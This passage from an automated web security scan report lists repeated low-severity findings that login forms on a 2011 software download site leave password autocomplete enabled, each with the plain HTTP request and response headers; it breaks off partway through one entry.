GET /64-bit-binaries-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:04 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:17 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22binaries%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22binaries%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88854


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.199. http://www.x64bitdownload.com/64-bit-binary-downloader-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-binary-downloader-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-binary-downloader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:42 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A17%3A%22binary-downloader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A17%3A%22binary+downloader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35748


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.200. http://www.x64bitdownload.com/64-bit-binary-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-binary-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-binary-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:36:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:46:34 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22binary%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22binary%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91309


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.201. http://www.x64bitdownload.com/64-bit-board-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-board-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-board-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:05:03 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22board%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22board%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88225


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.202. http://www.x64bitdownload.com/64-bit-boards-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-boards-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-boards-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:59 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:05:00 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22boards%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22boards%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86911


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.203. http://www.x64bitdownload.com/64-bit-client-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-client-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-client-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:57 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:29 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22client%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22client%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91161


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.204. http://www.x64bitdownload.com/64-bit-commander-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-commander-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-commander-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22commander%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22commander%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89024


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.205. http://www.x64bitdownload.com/64-bit-community-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-community-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-community-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:10:27 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22community%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22community%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90778


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.206. http://www.x64bitdownload.com/64-bit-complex-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-complex-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-complex-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:34 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22complex%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22complex%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 85797


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.207. http://www.x64bitdownload.com/64-bit-conference-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-conference-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-conference-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:49 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:04:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22conference%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22conference%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88850


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.208. http://www.x64bitdownload.com/64-bit-cross-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-cross-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-cross-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:37:34 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:47:56 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22cross%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22cross%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90500


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.209. http://www.x64bitdownload.com/64-bit-download-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-download-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-download-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:41:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:51:25 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22download%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22download%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94324


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.210. http://www.x64bitdownload.com/64-bit-downloader-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-downloader-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-downloader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:53:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:03:25 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22downloader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22downloader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98412


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.211. http://www.x64bitdownload.com/64-bit-explorer-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-explorer-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-explorer-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:44 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:55 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22explorer%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22explorer%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93074


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.212. http://www.x64bitdownload.com/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:40 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:44 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A32%3A%22ext2fs-ext3fs-paragon-extbrowser%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A32%3A%22ext2fs+ext3fs+paragon+extbrowser%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29987


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.213. http://www.x64bitdownload.com/64-bit-fast-download-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-fast-download-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-fast-download-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:00 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:07 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22fast-download%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22fast+download%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96343


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.214. http://www.x64bitdownload.com/64-bit-feed-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-feed-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-feed-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:51 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22feed%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22feed%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92799


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.215. http://www.x64bitdownload.com/64-bit-feedreader-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-feedreader-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-feedreader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:50:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:31 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22feedreader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22feedreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41067


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.216. http://www.x64bitdownload.com/64-bit-file-grabber-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
